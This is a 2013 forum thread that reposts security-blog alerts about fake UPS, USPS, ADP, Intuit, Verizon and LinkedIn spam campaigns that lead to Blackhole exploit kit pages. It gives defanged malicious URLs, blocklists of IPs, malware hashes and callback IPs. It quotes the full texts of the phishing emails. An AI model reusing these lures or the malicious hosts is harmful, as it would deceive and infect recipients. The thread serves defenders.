Something evil on 67.208.74.71
- http://blog.dynamoo.com/2013/02/something-evil-on-672087471.html
19 Feb 2013 - "67.208.74.71 (Inforelay, US) is a parking IP with several thousand IPs hosted on it. However, it also includes a large number of malicious sites using Dynamic DNS servces. Some of these sites have recently moved from the server mentioned here*.
Probably most of the sites on this server are legitimate and blocking access to it might cause some problems. However, you can block most of these malicious domains by targeting the Dynamic DNS domain...
You can find a copy of the domains, IPs, WOT ratings and Google prognosis here** [csv].
These following domains are hosted on 67.208.74.71 and are listed as malicious by Google's Safe Browsing Diagnostics...
These domains are hosted on 67.208.74.71 and are not flagged by Google, but almost all have a poor WOT reputation and are very likely to be malicious...
These sites appear to have been hosted recently on 67.208.74.71 and are flagged as malware by Google, but are not resolving at present...
These domains appear to have been recently hosted on 67.208.74.71, are not flagged as malicious by Google but are nonetheless suspect..."
(More detail available at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/02/something-evil-on-926310523.html
** http://www.dynamoo.com/files/67-208-74-71.csv
- https://www.google.com/safebrowsing/diagnostic?site=AS:33597
___
Fake UPS SPAM / emmmhhh .ru
- http://blog.dynamoo.com/2013/02/ups-spam-emmmhhhru.html
19 Feb 2013 - "The spammers sending this stuff out always confuse UPS with USPS, this one is not exception although on balance it is more UPS than USPS.. anyway, it leads to malware on emmmhhh .ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of Valda Gill via LinkedIn
Sent: 19 February 2013 10:00
Subject: United Postal Service Tracking Nr. H9878032462
You can use UPS .COM to:
Ship Online
Schedule a Pickup
Open a UPS .COM Account
Welcome to UPS Team
Hi, [redacted].
DEAR CUSTOMER , We were not able to delivery the post package
PLEASE PRINT OUT THE INVOICE COPY ATTACHED AND COLLECT THE PACKAGE AT OUR DEPARTMENT.
With best regards , UPS Customer Services.
Copyright 2011 United Parcel Service of America, Inc. Your USPS ...us
There is an attachment UPS_ID5408466.htm which attempts to direct visitors to [donotclick]emmmhhh .ru:8080/forum/links/column.php hosted on:
50.31.1.104 (Steadfast Networks, US)
66.249.23.64 (Endurance International, US)
195.210.47.208 (PS Internet Company, Kazakhstan)
The following IPs and domains are all malicious and should be blocked:
50.31.1.104
66.249.23.64
195.210.47.208..."
___
Something evil on 74.208.148.35
- http://blog.dynamoo.com/2013/02/something-evil-on-7420814835.html
19 Feb 2013 - "Spotted by the good folks at GFI Labs here*, here** and here*** are several Canadian domains on the same server, 74.208.148.35 (1&1, US):
justcateringfoodservices .com
dontgetcaught .ca
blog.ritual .ca
lumberlandnorth .com
Obviously, there's some sort of server-level compromise here. Blocking access to 74.208.148.35 will give some protection against several very active malicious spam campaigns..."
* http://gfisoftware.tumblr.com/post/43492163416/adp-payroll-invoice-spam
** http://gfisoftware.tumblr.com/post/43411593074/dun-bradstreet-complaint-spam
*** http://gfisoftware.tumblr.com/post/43163682384/citibank-incoming-international-wire-transfer-spam
___
Fake pharma SPAM - Cyberbunker / 84.22.104.123
- http://blog.dynamoo.com/2013/02/cyberbunker-fake-pharma-spam-8422104123.html
19 Feb 2013 - "Crime-friendly host Cyberbunker strikes again, this time hosting more fake pharma sites on 84.22.104.123, being promoted through this suspicious looking spam:
Date: Tue, 19 Feb 2013 22:58:26 +0000 (GMT)
From: Apple [noreply @bellona.wg.saar .de]
To: [redacted]
Subject: Your Apple ID was used to sign in to FaceTime, iCloud, and iMessage on an iPhone 5
Dear Customer,
Your Apple ID ([redacted]) was used to sign in to FaceTime, iCloud, and iMessage on an iPhone 5.
If you have not recently set up an iPhone with your Apple ID, then you should change your Apple ID password. Learn More.
Privacy Policy
Copyright 2013 Apple Inc. 1 Infinite Loop, Cupertino CA 95014 - All Rights Reserved.
The spam has a link to an illegally hacked legitimate site that then bounces to drugstorepillstablets .ru hosted on 84.22.104.123 along with... spammy sites... Cyberbunker is nothing but bad news. Blocking 84.22.96.0/19 is an exceptionally good idea.
(More detail at the dynamoo URL above.)
* https://www.google.com/safebrowsing/diagnostic?site=AS:34109
:fear::mad:
AplusWebMaster
2013-02-20, 13:43
FYI...
Fake USPS SPAM / USPS delivery failure report.zip
- http://blog.dynamoo.com/2013/02/usps-spam-usps-delivery-failure.html
20 Feb 2013 - "This fake USPS spam contains malware in an attachment called USPS delivery failure report.zip.
Date: Wed, 20 Feb 2013 06:40:39 +0200 [02/19/13 23:40:39 EST]
From: USPS client manager Michael Brewer [reports @usps .com]
Subject: USPS delivery failure report
USPS notification
Our company’s courier couldn’t make the delivery of package.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: KnoxvilleFort
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: M1PZN6BI4F
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
If the parcel isn’t received within 30 working days our company will have the right to claim compensation from you for it’s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
USPS Global.
The attachment is double-zipped, presumably to try to evade virus and content scanners. Opening it extracts another ZIP file called USPS report id 943577924988734.zip which contains another file called USPS report id 943577924988734.exe.
The VirusTotal detections for this are patchy and fairly generic*. Automated analysis tools are pretty inconclusive** when it comes to the payload, although if you are trying to clean it up then starting with HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched (which is set to "C:\Documents and Settings\All Users\svchost.exe") is probably a good start."
* https://www.virustotal.com/en/file/66eb0b099caf0cab296d7ad4cbe84e366c44cc465431a33963ac5b32d8e28682/analysis/1361351470/
File name: USPS report id 943577924988734.exe
Detection ratio: 27/46
Analysis date: 2013-02-20
** http://camas.comodo.com/cgi-bin/submit?file=66eb0b099caf0cab296d7ad4cbe84e366c44cc465431a33963ac5b32d8e28682
___
Something evil on 62.212.130.115
- http://blog.dynamoo.com/2013/02/something-evil-on-62212130115.html
20 Feb 2013 - "Something evil seems to be lurking on 62.212.130.115 (Xenosite, Netherlands) - a collection of sites connected with the Blackhole exploit kit, plus indications of evil subdomains of legitimate hacked sites. All-in-all, this IP is probably worth avoiding.
Firstly, there are the evil subomains that have a format like 104648746540365e.familyholidayaccommodation .co.za - these are mostly hijacked .co.za and .cl domains. The following list contains the legitimate domains and IPs that appear to have been hijacked. Ones marked in red have been flagged as malicious by Google. Remember, these IPs are not evil, it is just the subdomains that are (on a different IP)...
The second bunch of domains appear to be connected with the Blackhole Exploit kit (according to this report*) and can be assumed to be malicious, and are hosted on 62.212.130.115...
The final group is where it gets messy. These are malicious subdomains that either are on (or have recently been on) 62.212.130.115. It looks like they are hardened against analysis, but they certainly shouldn't be here and can be assumed to be malicious too..."
(More detail at the dynamoo URL above.)
* http://pastebin.com/FNjkdB34
___
famagatra .ru injection attack in progress
- http://blog.dynamoo.com/2013/02/famagatraru-injection-attack-in-progress.html
20 Feb 2013 - "There seems to be an injection attack in progress, leading visitors to a hacked website to a malicious page on the server famagatra .ru.
The payload is at [donotclick]famagatra .ru:8080/forum/links/public_version.php?atd=1n:33:2v:1l:1h&qav=3j&yvxhqg=1j:33:32:1l:1g:1i:1o:1n:1o:1i&jehmppj=1n:1d:1f:1d:1f:1d:1j:1k:1l (report here*) which is basically a nasty dose of Blackhole.
84.23.66.74 (EUserv Internet, Germany)
195.210.47.208 (PS Inernet Company, Kazakhstan)
210.71.250.131 (Chungwa Telecom, Taiwan)
The following domains are IPs are all part of the same evil circus:
84.23.66.74
195.210.47.208
210.71.250.131..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1050803
... Blackholev2 redirection successful
___
Fake Wire transfer SPAM / fulinaohps .ru
- http://blog.dynamoo.com/2013/02/wire-transfer-spam-fulinaohpsru.html
20 Feb 2013 - "This fake wire transfer spam leads to malware on fulinaohps .ru:
Date: Wed, 20 Feb 2013 04:28:14 +0600
From: accounting@[victimdomain]
Subject: Fwd: ACH and Wire transfers disabled.
Dear Online Account Operator,
Your ACH transactions have been
temporarily disabled.
View details
Best regards,
Security department
The malicious payload is at [donotclick]fulinaohps .ru:8080/forum/links/column.php (report here*) hosted om the following IPs:
84.23.66.74 (EUserv Internet, Germany)
195.210.47.208 (PS Internet Company, Kazakhstan)
210.71.250.131 (Chungwa Telecom, Taiwan)
These are the same IPs as used in this attack**, you should block them if you can."
* http://urlquery.net/report.php?id=1051770
... suspicious URL pattern... obfuscated URL
** http://blog.dynamoo.com/2013/02/famagatraru-injection-attack-in-progress.html
___
Fake SendSecure Support SPAM / secure_message... .zip
- http://blog.dynamoo.com/2013/02/sendsecure-support-spam.html
20 Feb 2013 - "This fake SendSecure Support / Bank of America spam comes with a malicious attachment called secure_message_02202013_01590106757637303.zip:
Date: Wed, 20 Feb 2013 11:23:43 -0400 [10:23:43 EST]
From: SendSecure Support [SendSecure.Support @bankofamerica .com]
Subject: You have received a secure message from Bank Of America
You have received a secure message.
Read your secure message by opening the attachment. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly.
First time users - will need to register after opening the attachment.
Help - https ://securemail.bankofamerica .com/websafe/help?topic=Envelope
The zip file secure_message_02202013_01590106757637303 .zip unzips into secure_message_02202013_01590106757637303 .exe with a VirusTotal detection**... According to ThreatExpert***, the malware installs a keylogger and also tries to phone home to:
blog.ritual .ca
dontgetcaught .ca
These sites are hosted on 74.208.148.35 which I posted about yesterday*. Blocking access to this IP might mitigate against this particular threat somewhat."
* http://blog.dynamoo.com/2013/02/something-evil-on-7420814835.html
** https://www.virustotal.com/en/file/3032621c36074eb28beb10730fdb2d2618fb4d59a7e6f3290b3d4ae0854afd7e/analysis/1361376818/
File name: secure_message_02202013_{DIGIT[17]}.exe
Detection ratio: 6/46
Analysis date: 2013-02-20
*** http://www.threatexpert.com/report.aspx?md5=d89e680d6e9fee363b27e6479a4dffd3
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Airline Ticket Credit Card Processing E-mail Messages - February 20, 2013
Fake CashPro Online Digital Certificate Notification E-mail Messages - February 20, 2013
Fake Tax Document Notification E-mail Messages - February 20, 2013
Fake Rejected Tax Form Notification E-mail Messages - February 20, 2013
Fake Bank Deposit Notification E-mail Messages - February 20, 2013
Fake Package Delivery Failure E-mail Messages - February 20, 2013
Fake Product Order E-mail Messages - February 20, 2013
(More info and links available at the cisco URL above.)
:fear::mad:
AplusWebMaster
2013-02-21, 16:45
FYI...
Fake ADP SPAM / faneroomk .ru
- http://blog.dynamoo.com/2013/02/adp-spam-faneroomkru.html
21 Feb 2013 - "This fake ADP spam tries (and fails) to lead to malware on faneroomk .ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply@bounce.linkedin .com] On Behalf Of LinkedIn
Sent: 20 February 2013 20:02
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 001737199
Thu, 21 Feb 2013 02:01:39 +0600
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www.flexdirect .adp.com/client/login.aspx
Please see the following notes:
• Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
• Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 890911798
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious payload is meant to be [donotclick]faneroomk .ru:8080/forum/links/column.php but right at the moment it is not resolving... The following IPs and domains are all related:
41.168.5.140
110.164.58.250
184.106.195.200
210.71.250.131
203.171.234.53 ..."
(More detail at the dynamoo URL above.)
___
Fake Verizon Wireless SPAM / participamoz .com
- http://blog.dynamoo.com/2013/02/verizon-wireless-spam-participamozcom.html
20 Feb 2013 - "This fake Verizon Wireless spam leads to malware on participamoz .com:
Date: Wed, 20 Feb 2013 23:24:49 +0400
From: "AccountNotify @verizonwireless .com" [cupcakenc0 @irs .gov]
Subject: Verizon wireless online bill.
Important account information from Verizon Wireless
Your current bill for your account ending in XXXX-XX001 is now available online in My Verizon
Total Balance Due: $48.15
Scheduled Automatic Payment Date: 02/25/2012
Mind that payments and/or adjustments made to your account after your bill was generated will be deducted from your automatic payment amount.
> Review and Pay Your Bill
Thank you for choosing Verizon Wireless.
My Verizon is also available 24/7 to assist you with:
Vrowsing your usage
Updating your plan
Adding Account Members
Paying your bill
Finding accessories for your devices
And much, much more...
2011 Verizon Wireless
Verizon Wireless | One Verizon Way | Mail Code: 190WVB | Basking Ridge, NJ 07990
We respect your privacy. Please review our privacy policy for more information
If you are not the intended recipient and feel you have received this email in error; or if you would like to update your customer notification preferences, please click here.
The malicious payload is at [donotclick]participamoz .com/detects/holds_edge.php hosted on:
161.200.156.200 (Chulanet, Thailand)
173.251.62.46 (MSP Digital / Cablevision, US)
The following IPs and domains are connected should be treated as malicious:
161.200.156.200
173.251.62.46
prosctermobile .com
aftandilosmacerati .com
pardontemabelos .com
participamoz .com ..."
___
Fake Verizon emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/02/21/fake-verizon-wireless-statement-themed-emails-lead-to-black-hole-exploit-kit/
Feb 21, 2013 - "On a periodic basis, cybercriminals are spamvertising malicious campaigns impersonating Verizon Wireless to tens of thousands of Verizon customers across the globe in an attempt to trick them into interacting with the fake emails... one of the most recently spamvertised campaigns impersonating Verizon Wireless. Not surprisingly, once users click on any of the links found in the malicious emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/02/verizon_wireless_statement_fake_email_spam_exploits_malware_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
participamoz .com – 173.251.62.46; 161.200.156.200 – Email: dort.dort @live .com
Name Server: NS1.THEREGISTARS .COM – 31.170.106.17 – Email: lockwr @rocketmail .com
Name Server: NS2.THEREGISTARS .COM – 67.15.223.219 – Email: lockwr @rocketmail .com
... Upon successful client-side exploitation, the campaign drops MD5: 4377dcc591f87cc24e75f8c69a2a7f8f * ... UDS:DangerousObject.Multi.Generic.
It then attempts to phone back to the following IPs:
110.143.183.104, 24.120.165.58, 110.143.183.104, 75.80.49.248, 71.42.56.253, 94.65.0.48,
98.16.107.213, 190.198.30.168, 76.193.173.205, 71.43.217.3, 66.229.110.89, 101.162.73.132,
94.68.49.208, 64.219.121.189, 99.122.152.158, 80.252.59.142, 108.211.64.46, 69.39.74.6,
91.99.146.167, 187.131.70.221, 76.202.211.184, 168.93.99.82, 122.60.136.168, 213.105.24.171,
122.60.136.168, 84.72.243.231, 79.56.80.211 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/856eea6c46708690bd2bafe3278f00d203b7bdab6d8f13ee988bd5b51b9b3dd9/analysis/
File name: info.exe
Detection ratio: 25/46
Analysis date: 2013-02-21
___
Fake "Efax Corporate" SPAM / fuigadosi .ru
- http://blog.dynamoo.com/2013/02/efax-corporate-spam-fuigadosiru.html
21 Feb 2013 - "This fake eFax spam leads to malware on fuigadosi .ru:
Date: Thu, 21 Feb 2013 -05:24:35 -0800
From: LinkedIn Password [password @linkedin .com]
Subject: Efax Corporate
Attachments: EFAX_Corporate.htm
Fax Message [Caller-ID: 705646877]
You have received a 29 pages fax at Thu, 21 Feb 2013 -05:24:35 -0800, (913)-809-4198.
* The reference number for this fax is [eFAX-806896385].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.
The malicious payload is at [donotclick]fuigadosi .ru:8080/forum/links/column.php (report here*) hosted on:
84.23.66.74 (EUserv Internet, Germany)
122.160.168.219 (Trackon Couriers, India)
210.71.250.131 (Chungwa Telecom, China)..."
* http://urlquery.net/report.php?id=1060334
___
Fake Trustwave TrustKeeper emails - Phish ...
- http://blog.spiderlabs.com/2013/02/-trustwave-trustkeeper-pci-scan-notification-phishing-alert.html
21 Feb 2013 - "Over the last few hours, Trustwave has received multiple reports of individuals receiving fake emails pretending to be from Trustwave. These emails did not originate from Trustwave. Recipients should immediately delete the emails and not follow any links presented in them. These emails indicate they are being sent as part of a “TrustKeeper PCI Scan Notification” and are alerting the recipient to login to a portal to respond to an issue related to a vulnerability scan of their network. Early analysis has shown these emails are being sent from many variations of fake Trustwave email addresses and redirecting users to multiple non-Trustwave URLs. Visiting these URLs might introduce malware onto your systems. Below is a screenshot of a fake email:
> http://npercoco.typepad.com/.a/6a0133f264aa62970b017d41337399970c-pi ..."
___
Fake inTuit emails - overdue payment
- http://security.intuit.com/alert.php?a=73
2/21/13 - "People are receiving fake emails with the title "Please respond - overdue payment." Below is a copy of the email people are receiving. The email does not contain a link; however, the email has a .zip attachment that contains malware. Do not open the .zip file:
Please find attached your invoices for the past months. Remit the payment by 02/25/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Earline Robles
This is the end of the fake email.
Steps to Take Now: Do -not- open the attachment in the email..."
___
Fake "Xerox WorkCentre Pro" SPAM / familanar .ru
- http://blog.dynamoo.com/2013/02/scan-from-xerox-workcentre-pro-spam.html
21 Feb 2013 - "This familiar printer spam leads to malware on the familanar .ru domain:
Date: Thu, 21 Feb 2013 09:22:25 -0500 [09:22:25 EST]
From: Tagged [Tagged @taggedmail .com]
Subject: Fwd: Re: Scan from a Xerox WorkCentre Pro #800304
A Document was sent to you using a XEROX WorkJet PRO 760820.
SENT BY : BRYNN
IMAGES : 5
FORMAT (.JPEG) DOWNLOAD
The malicious payload is at [donotclick]familanar .ru:8080/forum/links/column.php (report here*) hosted on:
84.23.66.74 (EUserv Internet, Germany)
122.160.168.219 (Trackon Couriers, India)
210.71.250.131 (Chungwa Telecom, China)
Which are the same IPs found in this attack** and several others. Block 'em if you can."
* http://www.urlquery.net/report.php?id=1064138
** http://blog.dynamoo.com/2013/02/efax-corporate-spam-fuigadosiru.html
___
Fake ACH transaction SPAM / payment receipt - 884993762994.zip
- http://blog.dynamoo.com/2013/02/ach-transaction-spam.html
21 Feb 2013 - "This fake ACH transaction spam comes with a malicous attachment:
Date: Thu, 21 Feb 2013 14:32:08 -0500 [14:32:08 EST]
From: Payment notification system [homebodiesga38@gmail.com]
Subject: Automatic transfer notification
ACH transaction is completed. $443 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Receipt on payment is attached.
This is an automatically generated email, please do not reply
Attached is a file called payment receipt - 884993762994.zip which unzips to payment receipt - 884993762994.exe which has a disappointing VirusTotal detection count of just 14/46... Blocking EXE-in-ZIP files at the perimeter generally causes very little trouble, assuming you can do it.."
:fear::mad:
AplusWebMaster
2013-02-22, 18:32
FYI...
Fake Invoice SPAM - "End of Aug. Stat" forummersedec .ru
- http://blog.dynamoo.com/2013/02/end-of-aug-stat-spam-forummersedecru.html
22 Feb 2013 - "This fake invoice email leads to malware on forummersedec .ru:
Date: Fri, 22 Feb 2013 11:33:38 +0530
From: AlissonNistler@ [victimdomain]
Subject: Re: FW: End of Aug. Stat.
Attachments: Invoices-1207-2012.htm
Hallo,
as reqeusted I give you inovices issued to you per dec. 2012 ( Internet Explorer/Mozilla Firefox file)
Regards
The attachment attempts to redirect the victim to a malicious payload at [donotclick]forummersedec .ru:8080/forum/links/column.php (report here*) hosted on
84.23.66.74 (EUserv Internet, Germany)
122.160.168.219 (Trackon Couriers, India)
The following IPs and domains are related and should be blocked:
84.23.66.74
122.160.168.219...
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1069702
___
Fake "Data Processing" SPAM / dekolink .net
- http://blog.dynamoo.com/2013/02/data-processing-spam-dekolinknet.html
22 Feb 2013 - "This fake "Data Processing" spam leads to malware on dekolink .net:
Date: Fri, 22 Feb 2013 08:06:43 -0500
From: "Data Processing Service" [customersupport @dataprocessingservice .com]
Subject: ACH file ID '768.579
Files Processing Service
SUCCESS Note
We have successfully handled ACH file 'ACH2013-02-20-5.txt' (id '768.579') submitted by user '[redacted]' on '2013-02-20 1:14:30.7'.
FILE SUMMARY:
Item count: 79
Total debits: $28,544.53
Total credits: $28,544.53
For more info click here
The malicious payload is at [donotclick]dekolink .net/detects/when-weird-contrast.php (report here*) hosted on the following servers:
50.7.251.59 (FDC Servers, Czech Republic)
176.120.38.238 (Langate, Ukraine).."
* http://urlquery.net/report.php?id=1062564
... BlackHole v2.0 exploit kit
___
Fake LinkedIn SPAM / greatfallsma .com
- http://blog.dynamoo.com/2013/02/linkedin-spam-greatfallsmacom.html
22 Feb 2013 - "This "accidental" LinkedIn spam is a fake and leads to malware on greatfallsma .com:
From: LinkedIn [mailto:papersv@ informer.linkedin .com]
Sent: 22 February 2013 15:58
Subject: Reminder about link requests pending
See who connected with you this week on LinkedIn
Now it's easy to connect with people you email
Continue
This is an accidental LinkedIn Marketing email to help you get the most out of LinkedIn. Unsubscribe
© 2013, LinkedIn Corporation. 2089 Stierlin Ct, Mountain View, CA 99063
> Another example:
Date: Fri, 22 Feb 2013 18:21:25 +0200
From: "LinkedIn" [noblest00@ info.linkedin .com]
Subject: Reminder about link requests pending
[redacted]
See who requested link with you on LinkedIn
Now it's easy to connect with people you email
Continue
This is an casual LinkedIn Marketing email to help you get the most out of LinkedIn. Unsubscribe
2013, LinkedIn Corporation. 2073 Stierlin Ct, Mountain View, CA 98043
The malicious payload is at [donotclick]greatfallsma .com/detects/impossible_appearing_timing.php (report here*) hosted on:
50.7.251.59 (FDC Servers, Czech Republic)
176.120.38.238 (Langate, Ukraine)
These are the same two servers used in this attack, blocking them would probably be a good idea."
* http://urlquery.net/report.php?id=1071027
... Blackhole 2 Landing Page
:fear::mad:
AplusWebMaster
2013-02-25, 12:40
FYI...
Fake ACH emails serve client-side exploits and malware
- http://blog.webroot.com/2013/02/25/malicious-data-processing-service-ach-file-id-themed-emails-serve-client-side-exploits-and-malware/
Feb 25, 2013 - "... yet another spam campaign, this time impersonating the “Data Processing Service” company, in an attempt to trick its customers into interacting with the malicious emails. Once they do so, they are automatically exposed to the client-side exploits served by the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/02/fake_email_spam_exploits_malware_black_hole_exploit_kit_data_processing_service_ach.png
... Upon successful client-side exploitation, the campaign drops MD5: faa3a6c7bbf5b0449f60409c8bf63859 * ... Trojan-Spy.Win32.Zbot.jfpy.
... It then attempts to connect to the following IPs:
24.120.165.58, 66.117.77.134, 64.219.121.189, 66.117.77.134, 75.47.231.138, 108.211.64.46,
91.99.146.167, 108.211.64.46, 71.43.217.3, 81.136.230.235, 101.162.73.132, 99.76.3.38,
85.29.177.249, 24.126.54.116, 108.130.34.42, 99.116.134.54, 80.252.59.142
Malicious domain name reconnaissance:
dekolink .net – 50.7.251.59; 176.120.38.238 – Email: wondermitch @hotmail .com
Name Server: NS1.THEREGISTARS .COM – 31.170.106.17 – Email: lockwr @rocketmail .com
Name Server: NS2.THEREGISTARS .COM – 67.15.223.219 – Email: lockwr @rocketmail .com ..."
(More detail available at the webroot URL above.)
* https://www.virustotal.com/en/file/1313dd0cb96b45cea83e3d3c641058205bec547eb50080cbed6eeaee7968ca62/analysis/
File name: info.exe
Detection ratio: 27/45
Analysis date: 2013-02-25
___
Trustwave Trustkeeper Phish
- https://isc.sans.edu/diary.html?storyid=15271
Last Updated: 2013-02-25 17:41:36 UTC - ... the give away that this is a fake is the from e-mail address as well as the link leading to a different site then advertised. Click on the image for a full size example.
> https://isc.sans.edu/diaryimages/images/trustwavephish.png
[Update:] An analysis of this phish by Trustwave's own Spiderlabs can be found here:
- http://blog.spiderlabs.com/2013/02/more-on-the-trustkeeper-phish.html
- http://blog.dynamoo.com/2013/02/trustkeeper-vulnerabilities-scan.html
25 Feb 2013 - "... this "TrustKeeper Vulnerabilities Scan Information" -spam- leads to an exploit kit on saberdelvino .net...
> https://lh3.ggpht.com/-Gyic2-WNNZE/USu7TzQllfI/AAAAAAAAA9w/y_R4ahAMgrY/s1600/trustwave.png
... The malicious payload is at [donotclick]saberdelvino .net/detects/random-ship-members-daily.php (report here*) hosted on the following IPs:
118.97.77.122 (PT Telekon, Indonesia)
176.120.38.238 (Langate, Ukraine)..."
* http://www.urlquery.net/report.php?id=1120754
... Blackhole 2
:fear::mad:
AplusWebMaster
2013-02-26, 22:32
FYI...
Fake Facebook SPAM / lazaro-sosa .com
- http://blog.dynamoo.com/2013/02/facebook-spam-lazaro-sosacom.html
26 Feb 2013 - "This fake Facebook spam leads to malware on lazaro-sosa .com:
Date: Tue, 26 Feb 2013 14:26:20 +0200
From: "Facebook" [twiddlingv29@informer.facebook.com]
Subject: Brian Parker commented your photo.
facebook
Brian Parker commented on Your photo.
Reply to this email to comment on this photo.
See Comment
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please unsubscribe.
Facebook, Inc., Attention: Department 415, PO Box 10001, Palo Alto, CA 90307
The malicious payload is at [donotclick]lazaro-sosa .com/detects/queue-breaks-many_suffering.php (report here*) hosted on:
118.97.77.122 (PT Telkom, Indonesia)
147.91.83.31 (AMRES, Serbia)
Blocking these IPs is probably prudent."
* http://www.urlquery.net/report.php?id=1135254
... Blackhole
___
Fake Intuit SPAM / forumligandaz .ru
- http://blog.dynamoo.com/2013/02/intuit-spam-forumligandazru.html
26 Feb 2013 - "This fake Intuit spam leads to malware on forumligandaz .ru:
Date: Tue, 26 Feb 2013 01:27:09 +0330
From: "Classmates . com" [classmatesemail@accounts.classmates.com]
Subject: Payroll Account Holded by Intuit
Direct Deposit Service Informer
Communicatory Only
We cancelled your payroll on Tue, 26 Feb 2013 01:27:09 +0330.
Finances would be gone away from below account # ending in 8733 on Tue, 26 Feb 2013 01:27:09 +0330
amount to be seceded: 3373 USD
Paychecks would be procrastinated to your personnel accounts on: Tue, 26 Feb 2013 01:27:09 +0330
Log In to Review Operation
Funds are typically left before working banking hours so please make sure you have enough Finances accessible by 12 a.m. on the date Cash are to be seceded.
Intuit must reject your payroll by 4 p.m. Central time, two banking days before your paycheck date or your state would not be paid on time.
QuickBooks does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Regards,
Intuit Payroll Services
The malicious payload is at [donotclick]forumligandaz .ru:8080/forum/links/column.php hosted on:
31.200.240.153 (Unelink Telecom, Spain)
83.169.41.58 (Host Europe, Germany)
Blocklist:
31.200.240.153
83.169.41.58 ..."
(More detail at the dynamoo URL above.)
:mad::fear:
AplusWebMaster
2013-02-27, 21:41
FYI...
Fake US Airways SPAM / berrybots .net
- http://blog.dynamoo.com/2013/02/us-airways-spam-berrybotsnet.html
27 Feb 2013 - "... fake US Airways spam leads to malware on berrybots .net:
Date: Wed, 27 Feb 2013 08:09:36 -0500 [08:09:36 EST]
From: bursarp1 @email-usairways .com
Subject: Your US Airways trip...
> http://images.usairways.com/newEmail/gen3/templates/header_630px_yrs.gif
Confirmation code: B339AO
Date issued: Tuesday, February 26, 2013
Barcode
[redacted]
Scan at any US Airways kiosk to check in
Passenger summary
Passenger name
Frequent flyer # (Airline)
Ticket number
Special needs
Angel Morris 40614552582 (US) 22401837506661
Robert White 12938253579871
Fly details Download to Outlook
Depart: Philadelphia, PA (PHL) Chicago, IL (O'Hare) (ORD)...
(More detail at the dynamoo URL above.)
Picture version (click to enlarge):
> http://blog.dynamoo.com/2013/02/us-airways-spam-berrybotsnet.html
The malicious payload is at [donotclick]berrybots .net/detects/circulation-comparatively.php (report here*) hosted on:
118.97.77.122 (PT Telkon, Jakarta)
147.91.83.31 (AMRES, Serbia)
195.88.139.78 (Neiron Systems, Ukraine)
Recommended blocklist:
118.97.77.122
147.91.83.31
195.88.139.78
greatfallsma .com
lazaro-sosa .com
yoga-thegame .net
dekolink .net
saberdelvino .net
berrybots .net ..."
* http://www.urlquery.net/report.php?id=1168427
... Blackhole Java applet with obfuscated URL
... 147.91.83.31 Blackhole 2 Landing Page
___
Fake Invoice-themed SPAM / forumusaaa .ru
- http://blog.dynamoo.com/2013/02/end-of-aug-statement-spam-forumusaaaru.html
27 Feb 2013 - "This invoice-themed spam leads to malware on forumusaaa .ru:
Date: Thu, 28 Feb 2013 06:04:08 +0530
From: "Lisa HAGEN" [WilsonVenditti @ykm .com .tr]
Subject: Re: FW: End of Aug. Statement
Attachments: Invoice_JAN-2966.htm
Good day,
as reqeusted I give you inovices issued to you per jan. (Microsoft Internet Explorer).
Regards
Lisa HAGEN
The malware is hosted at [donotclick]forumusaaa .ru:8080/forum/links/column.php (report here*) hosted on:
31.200.240.153 (Unelink Telecom, Spain)
83.169.41.58 (Host Europe, Germany)
Blocklist:
31.200.240.153
83.169.41.58..."
(More listed at the dynamoo URL above.)
* http://www.urlquery.net/report.php?id=1170276
... suspicious URL pattern
... 31.200.240.153 Blackhole 2 Landing Page
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Payment Advice Notification E-mail Messages - February 27, 2013
Fake Overdue Payment Notification E-mail Messages - February 27, 2013
Fake Bank Account Update E-mail Messages - February 27, 2013
Fake Product Order E-mail Messages - February 27, 2013
Fake Product Order Quotation Attachment E-mail - February 27, 2013
Fake Wire Transfer Notification E-mail Messages - February 27, 2013
Fake Invoice Statement Attachment E-mail Messages - February 27, 2013
Fake Bank Account Statement Notification E-mail Messages - February 27, 2013
Fake Quotation Attachment E-mail Messages - February 27, 2013
(Links and more info at the cisco URL above.)
:mad:
AplusWebMaster
2013-02-28, 14:35
FYI...
"Follow this link" SPAM / sidesgenealogist .org
- http://blog.dynamoo.com/2013/02/follow-this-link-spam.html
28 Feb 2013 - "This rather terse spam appears to lead to an exploit kit on sidesgenealogist .org:
